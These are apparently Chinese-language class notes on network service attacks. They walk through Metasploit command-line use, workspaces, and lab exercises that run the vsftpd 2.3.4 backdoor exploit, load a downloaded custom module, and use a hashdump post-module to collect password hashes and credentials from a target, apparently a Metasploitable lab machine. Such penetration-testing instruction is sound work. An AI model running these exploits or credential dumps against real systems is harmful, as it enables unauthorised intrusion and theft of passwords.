# 108 網路服務攻擊1介紹與實務操作 (10/24) ###### tags: `LZ` --- Metasploit Framework == #### Update metasploit \# apt update; apt install metasploit-framework -y #### Update searchsploit \#searchsploit [--update/-u] #### modules 存放目錄 /usr/share/metasploit-framework/modules/ #### 啟動Metasploit Framework指令 \# msfconsole ## 參數 -\-help/-h 顯示提示文件 -H 儲存指令記錄至檔案 -q 靜音開啟 -x 指令執行 -r 透過檔案執行指令 ## 範例指令 #### 儲存指令記錄到text.txt \# msfconsole -H text.txt #### 讀取指令紀錄並執行 \# msfconsole -r test.txt #### 直接執行Payload \# msfconsole -x 'use exploit/unix/ftp/vsftpd_234_backdoor;set RHOST [ip];run' #### 列出工作區域 (預設default) msf5> workspace #### 新增工作區域 msf5> workspace -a [Name] #### 切換工作區域 msf5> workspace [Name] #### 刪除工作區域 msf5> workspace -d [Name] ## 10/24練習四 #systemctl postgresql start \# msfconsole -qH command.txt msf5> search platform:unix cve-2019 msf5> search -u platform:unix distcc msf5> info msf5> show options msf5> show missing msf5> set RHOSTS [ip] msf5> run CTRL + c msf5> exit \# sed -i 's/exit//g' command.txt <<把最後一行的exit刪除 \# msfconsole –r command.txt ## 10/24練習五 \# msfconsole -q 看看exploit的總數 開一個新的Terminal \# cd /root/.msf4/modules/ \# mkdir exploits \# cd exploits \# mkdir private \# cd private \# wget https://gist.githubusercontent.com/todb-r7/5935519/raw/f18d6b0dcd94d135a567e5b50a9b1cab3a1c5e1b/test_module.rb -O test.rb msf5> reload_all 看看exploit總數 msf5> use exploits/private/test msf5> show options msf5> run ## 10/24練習六 \# msfconsole -q msf5> db_status msf5> workspace -a Lab msf5> db_nmap [ip] msf5> db_import tcp_all.nmap msf5> hosts msf5> services msf5> use exploit/unix/ftp/vsftpd_234_backdoor msf5> set rhosts [ip] msf5> run 按下鍵盤 ctrl+z 將session切換至背景 msf5> use post/linux/gather/hashdump msf5> set session 1 msf5> run msf5> creds <<列出被發現的帳號密碼 msf5> loot <<列出被發現的帳號密碼檔及本機的儲存位置 ## Homework參考 https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide